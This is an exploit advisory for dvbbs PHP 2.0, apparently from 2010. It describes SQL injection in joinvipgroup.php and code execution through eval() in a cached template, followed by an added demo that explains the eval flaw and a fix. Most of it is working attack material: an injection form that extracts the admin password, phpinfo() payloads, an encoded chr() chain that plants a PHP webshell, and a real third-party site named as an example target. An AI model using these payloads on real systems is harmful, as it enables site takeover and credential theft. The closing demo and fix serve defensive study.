dvbbs php 2.0: multiple vulnerabilities
Source: http://www.x-xox-x.com  Author: xhm1n9  Published: 2010-08-24
Author: xhm1n9 [ESST]
EMail: xhm1n9#x-xox-x.com
Site: http://www.x-xox-x.com
Date: 2010-08-20

1. joinvipgroup.php // SQL injection

function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];   // raw POST value, concatenated into the UPDATE below
$vipmoney=$_POST['vipmoney'];    // raw POST value, concatenated into the UPDATE below
$vipticket=$_POST['vipticket'];  // raw POST value, concatenated into the UPDATE below
if($groupid==0 or $vipmoney<0 or $vipticket<0){ // loose comparison: a string such as '0,...' is not < 0 and passes
showmsg($lang['join.info4']);
exit;
}
$issql=$db->scalar("SELECT count(1) FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'");echo $issql;
if($issql>0 AND ($sql=$db->query("SELECT usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'"))){
while ($arr=$db->fetch_array($sql)){
$vipgroupsetting=explode(",",$arr['groupsetting']);
$upsetting=explode($lang['join.separator1'], $vipgroupsetting[71]); // cost of upgrading to this group: coins§tickets§valid days§minimum days
if($btype==1){
$vipmoney=0;
if(intval($upsetting[3])>0){
$mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
if($userinfo['userticket']<$vipticket or $vipticket<$mustnum){
showmsg($lang['join.info6']);
exit;
}
$updats=$vipticket*$upsetting[2]/$upsetting[1];
$updats=intval(number_format($updats,0));
}else{
$vipticket=0;
if($upsetting[3]>0){
$mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
if($mustnum>0){
$mustnum=number_format($mustnum,0);
}else{
showmsg($lang['join.info5']);
exit;
}
}
if($userinfo['usermoney']<$vipmoney || $vipmoney<$mustnum){echo "ri";
showmsg($lang['join.info7']);
exit;
}
$updats=$vipmoney*$upsetting[2]/$upsetting[0];
$updats=intval(number_format($updats,0));
}
// Only the SELECTs above use intval($groupid); the UPDATEs below concatenate
// $groupid, $vipmoney and $vipticket as received. Note also that $updats is
// computed above while the statements use $updates, which is never assigned.
if($vipgroupuser===true){
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".($userinfo['vip_endtime']+$updates*24*3600)."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}else{
$db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".(TIME_NOW+$updates*24*3600)."',vip_startime='".TIME_NOW."' WHERE userid=".$userid."");
$db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
}
..............................................................

The $vipmoney variable is never filtered before it is concatenated into the UPDATE statement. Prerequisites for exploitation: the administrator has created a VIP user group, and the attacking account holds some coins :)

<title>test</title><form name="p_form" id="p_form" method="post" action="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" enctype="multipart/form-data">
<input id='img_thumb_final' name='vipmoney' type="text" value="0,useremail=123456">
<input id='img_thumb_final' name='vipticket' type="text" value="88">
<input id='img_thumb_final' name='vipgroupid' type="text" value="25">
<input id='img_thumb_final' name='Btype' type="text" value="">
<input name="sub" type="submit" value="Submit" />
</form>

<!--
Alternative vipmoney value: copies the password value of dv_admin id=1 into the userface column of userid=1, with '#' commenting out the rest of the statement:
0,userface=(select password from dv_admin where id=1) where userid=1#
-->

2. cache/static/index_0_0.php // code execution
index.php

if($userid == 0){
$indexstatic= CACHE_PATH."static/index_0_".$boardid.".php";
}
else{
$indexstatic= CACHE_PATH."static/index_".$boardid.".php";
}
................................................
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){

....................................
if($useindexstatic_css && $page < 2 && $topicmode==0){
$this_my_f= ob_get_contents(); // generate the cache file from the buffered output
ob_end_clean();
to_static_php_file($indexstatic,$this_my_f);
}
...................................
}
..................................
function to_static_php_file($file_name,&$file_content)
{
if (is_file ($file_name)){
return true;
}
else{
$handle = fopen ($file_name,"w");
if (!is_writable ($file_name)){
return false;
}
if (!fwrite ($handle,$file_content)){
return false;
}
fclose ($handle);
return true;
}
}



The generated cache file contains an eval(), but nothing at the top of the file restricts direct access, so it can be requested on its own. The eval() compiles a double-quoted string into which the value of $lang['tpl.str10'] has already been interpolated; a value of the form {${phpinfo()}} therefore lands inside the evaluated code as PHP's complex variable syntax, and phpinfo() is called when that code runs:

<? eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");?>


index_0_0.php?lang[tpl.str10]={${phpinfo()}}



3. templates/default/index.tpl.php // code execution

<?
if( !defined('ISDVBBS') ){
header('HTTP/1.0 404 Not Found');
exit;
}
global $imgurl;
if($useindexstatic)
echo '<? eval("\$lang[\'tpl.str10\']=\"{$lang[\'tpl.str10\']}\";");?>';
else
eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");
?>
.........................
index.php
........... // part of the code omitted
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
if($useindexstatic_css &&$page < 2 && $topicmode==0){
$useindexstatic= true;
ob_start();
}
else
$useindexstatic= false;
include_once INC_PATH.'DV_Encoding.class.php';
$objenc =& DV_Encoding::GetEncoding($charset);
$lang = load_lang($lang, 'index' );
....................

index.php includes the template but never initialises the $lang variable, so its contents can be supplied from the request; as long as the condition if($useindexstatic_css && $page < 2 && $topicmode==0) is satisfied, the attack succeeds.

Example: http://www.flyingcity.cn/bbs/index.php?lang[tpl.str10]={${phpinfo()}}

index.php?lang[tpl.str10]={${phpinfo()}}

index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(32).chr(62).chr(39).chr(41).chr(59))}}

The chr() chain decodes to the one-line shell writer fputs(fopen('x.php','w+'),'<?eval($_POST[c])?>'); (as written, the chain contains chr(32), a space, between the '?' and '>').
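Sections 2 and 3 execute the same line, so one added example (mine, not dvbbs code) serves both: it reproduces the template's eval() over an interpolated string, demonstrates with a harmless stand-in function that a {${...}} value calls whatever function is named in it, and shows a replacement that expands the same {$name} placeholders from a whitelist without compiling anything. The global $imgurl is the one the template declares; marker(), the sample language strings and the image URL are constructed for this demo.

```php
<?php
// Added example (not dvbbs code): eval() over an interpolated double-quoted
// string, the {${...}} payload shape, and an eval-free placeholder expander.
// $imgurl mirrors the template's global; marker() and the strings are constructed.

$imgurl = 'http://127.0.0.1/dvbbs/images';

// Mirrors templates/default/index.tpl.php: the current value of
// $lang['tpl.str10'] is pasted into the source text that eval() compiles.
function vulnerable_expand(array $lang)
{
    global $imgurl;
    eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");
    return $lang['tpl.str10'];
}

// Harmless stand-in for phpinfo()/system(): records that it was called and
// returns a variable name so the ${...} lookup resolves without a notice.
function marker()
{
    $GLOBALS['marker_ran'] = true;
    return 'imgurl';
}

// Hardened replacement: only {$name} placeholders whose name is in an explicit
// whitelist are substituted; the string is never handed to the compiler.
function safe_expand(array $lang, array $vars)
{
    return preg_replace_callback('/\{\$(\w+)\}/', function ($m) use ($vars) {
        return array_key_exists($m[1], $vars) ? $vars[$m[1]] : $m[0];
    }, $lang['tpl.str10']);
}

// A legitimate language string (no double quotes, or the eval'd code would not
// even parse) and the advisory's payload shape with marker() in place of phpinfo().
$benign  = ['tpl.str10' => 'Images are served from {$imgurl}'];
$payload = ['tpl.str10' => '{${marker()}}'];

$marker_ran = false;
echo vulnerable_expand($benign), "\n";   // expanded as the template intends
echo vulnerable_expand($payload), "\n";  // also "expands": marker() has run
var_dump($marker_ran);

$marker_ran = false;
echo safe_expand($benign, ['imgurl' => $imgurl]), "\n";   // same expansion
echo safe_expand($payload, ['imgurl' => $imgurl]), "\n";  // left verbatim
var_dump($marker_ran);
```

Run it and compare the two var_dump() lines: with the eval() the flag flips to true because the evaluated statement is `$lang['tpl.str10']="{${marker()}}";`, and inside a double-quoted string `${expr}` evaluates `expr` to obtain a variable name. Swap marker() for phpinfo() or system() and you have the advisory's payload. Note that `${expr}` interpolation is deprecated as of PHP 8.2, but it still executes; the fix is to drop the eval(), not to rely on the deprecation.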


 